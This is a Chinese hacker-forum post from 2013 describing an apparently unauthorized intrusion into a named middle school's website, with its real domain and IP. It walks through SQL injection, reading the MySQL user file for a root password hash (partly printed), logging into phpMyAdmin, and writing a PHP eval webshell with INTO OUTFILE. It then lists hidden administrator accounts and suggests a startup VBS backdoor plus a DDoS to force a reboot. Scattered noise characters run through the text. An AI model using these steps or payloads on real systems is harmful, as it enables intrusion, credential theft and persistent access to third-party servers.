找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2859|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏+ x0 \8 A( |1 n7 J  O- u" C+ r/ u
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!- j  e: Z1 }* O: y
0 H/ `/ e/ q, I1 k1 a: D

" H/ z# L6 t3 |! n$ Z; d5 {
, Z( r1 y. e. P( K/ q常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 0 f0 \7 ?4 f1 k) |# J: G4 Y
  T/ J: Y$ d2 u: C' B
那么想可以直接写入shell ,getshell有几个条件:
' E  }/ L' O9 c1 K1 r
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
) o( Q1 ?8 k+ g$ g& m& @) l& r$ B* w1 J+ _* p- Z) o0 `5 J! `1 d
试着爆绝对路径:
/ P  u) n  U% R2 u1./phpMyAdmin/index.php?lang[]=1  * K$ d  t3 o  v; K: ~6 |. d0 Q2 p
2./phpMyAdmin/phpinfo.php  
+ S  v1 p1 N, y3./load_file()  . ^8 v* s1 |1 H. H9 j4 ?) q& Q
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  " q' u9 ~1 W( a" m4 A8 X
5./phpmyadmin/libraries/select_lang.lib.php  + h" x- H- T5 p# T
6./phpmyadmin/libraries/lect_lang.lib.php  ) v6 f9 s. C0 _+ g3 v! p. R
7./phpmyadmin/libraries/mcrypt.lib.php   ; P" D" g9 J1 Y5 z3 E2 T9 R
8./phpmyadmin/libraries/export/xls.php  
6 j% `; H* }7 t
! p% S/ e+ }# x均不行...........................
. b9 y/ t0 H$ f$ p3 y% N
. E% L% c2 ?+ _9 V& Z5 ^, c  y御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
/ B/ U9 O) E0 J/ S- m- X
) `5 ]- g8 }9 Q4 U+ N3 e$ P/ F/ C8 n权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
8 n$ r6 M5 S4 s6 T7 h) _, ?2 Y. a* z: E7 F/ ]( I
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
7 R4 U3 M% E) K2 z/ ~
4 z7 t# f: _7 n/ [. K7 [敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........& K. \) W* o$ D; R, i2 ?

, j* a6 h8 T0 {想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 0 v1 p9 s" w+ h$ P2 P; f
9 D2 j" c$ c+ _! G0 k
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini $ c, ?! m- W, w7 |$ d

2 l2 O$ ~: m3 P. n$ q, G自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD ( W7 |$ c% z- z6 @
9 L0 |) E$ L* t8 j
成功读到root密码:
; w' {' P- \  m9 W) e" v$ g* f, }8 ?. K
17---- r(0072)1 _! J' ^( r8 A6 Y; g7 C) Z# }* M
18---- o(006f)
" G, t4 O* a9 }8 j/ r9 I19---- o(006f)+ c4 W6 f+ L. x9 T: b; D# K4 F
20---- t(0074)
9 Z0 v! e$ q' q( S21---- *(002a)
& ?: Q5 k! `+ r5 B22---- 8(0038)
+ v9 b! R8 v: d23---- 2(0032)
9 |- v. l% l% G" a. G3 E5 W7 A* \24---- E(0045)
& G5 q3 k/ K5 f- }8 W  z2 ~* A25---- 1(0031)
( Q0 l" R% v3 v6 ]26---- C(0043)
: W: {& z; W3 h6 O27---- 5(0035)7 E  I: M6 @3 R
28---- 8(0038)
. q+ |" ~0 |9 R& z7 A3 X- V1 q9 c29---- 2(0032)9 p" s6 c  Z1 v$ P% z
30---- 8(0038). g  f& p! n" V& ~4 m
31---- A(0041)  x9 }: ~( U0 }' a4 ~! G
32---- 9(0039)) H2 i+ R4 i; w
33---- B(0042), }2 O+ ]9 u  w- n9 V9 n" t
34---- 5(0035)/ H8 B/ C( A$ i6 }7 ~) x2 |/ @6 {
35---- 4(0034)
  i7 B2 ^1 Y; u6 |* c36---- 8(0038)# r. [6 `# ^4 H! R0 g
37---- 6(0036)
# X: L! ~; G3 q9 m38---- 4(0034)
! p* C' H8 K+ Y% S$ A6 z39---- 9(0039)
- X" r8 X' B( S3 X" V; k+ \40---- 1(0031)/ N* S2 n  p' Z7 V
41---- 1(0031); q5 ?/ F! n% U* s
42---- 5(0035)8 ]. L, X- V6 [  q" n
43---- 3(0033)+ x- ^, r/ M+ e9 c# U1 h0 J9 r
44---- 5(0035)
2 ^3 k& l0 {4 s( W! _45---- 9(0039)
5 }% K$ r' }7 {7 o46---- 8(0038)
, p: b0 T, h' R% v2 W8 D( H" d0 u47---- F(0046)
: i& I! O6 i" `% N( A1 `48---- F(0046)
4 [5 B1 J- O8 a1 ?4 J49---- 4(0034)  s4 f( t* g# b+ V
50---- F(0046)1 V) V/ P, p! ]7 [0 _
51---- 0(0030)
2 q7 n' A+ p) Y6 L7 l9 s% P) @6 e52---- 3(0033)
" k/ N% c/ _: [" J& z8 k53---- 2(0032)8 Q( P( {: ]- _4 T6 f2 \
54---- A(0041)
9 ~2 J$ j: B7 w3 N55---- 4(0034)
+ u; d, Y- ]) P( w  y9 c3 K& p56---- A(0041)
0 d, x6 {9 |, u2 z  [  `57---- B(0042)6 K1 r8 N5 a+ e: B/ b
58---- *(0044)7 f% p8 l7 P/ d0 V$ `- g
59---- *(0035)! F: a, L* B- ?# A  G8 p6 E, J% c
60---- *(0041)
) o, C+ e  ]& o; n- _$ ]61---- *0032)0 Q1 X8 Q# g6 N( o+ R" w
$ P3 S% Z5 v: y5 r" f: q2 ?# j* i
解密后成功登陆phpmyamin
" n6 w& @; Y) l) L. [# O                          
8 U  p- Y- q( i' G0 f3 N6 m/ a& W9 k9 W' u2 s2 L
                               _  X) y1 N& [8 ~8 f2 j& D5 z+ R
) ^6 w5 Y0 c1 k. C
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
# A- @) Q3 [' C3 Y" o! }1 x) `6 w$ i3 f' f1 J
成功执行,拿下shell,菜刀连接:
  W% F* P4 E9 w* _6 l1 O! }( V5 Q
& s8 C) n$ Q& r- L% k, T服务器不支持asp,aspx,php提权无果...................4 M) I) E' Y. P# q# y' ^3 Q+ K
( `, U0 Q, e0 g5 s4 s5 S- v& @& g
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:5 |, b) s4 s- u5 |* u" g2 F
服务器上已经有个隐藏帐号了

3 y# p! o. \& h+ p
别名     administrators
. ?2 s( d0 Z+ B7 p: k0 P1 U- ]8 Q# f注释     管理员对计算机/域有不受限制的完全访问权

' B7 v! w/ `+ y. L( k/ {
成员

! a2 n! h+ t' n( Q) k$ s* t
-------------------------------------------------------------------------------' x5 o2 }9 E' F8 A# R" ?3 o4 s
admin  F, d+ A/ D3 w+ J  ?
Administrator
* X1 |& d, \/ u% Xslipper$
& T2 a5 j! W; p+ qsqluser' [4 L! n  |2 l3 v8 B2 M3 U+ d
命令成功完成。
! _! g* w2 D: M; [6 e# Y1 I& L
: Q# o; \6 P- e5 e  H  d服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
$ s9 e$ a# x6 _5 g6 Q- @, u5 D
" ^5 y" O# A0 jddos服务器重启,不然就只能坐等服务器重启了...............................+ Y, j" p+ Z  t0 B4 b1 O. Q

8 C# f1 ^+ C( [: W      
! X4 d$ [" R6 J( m) t

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表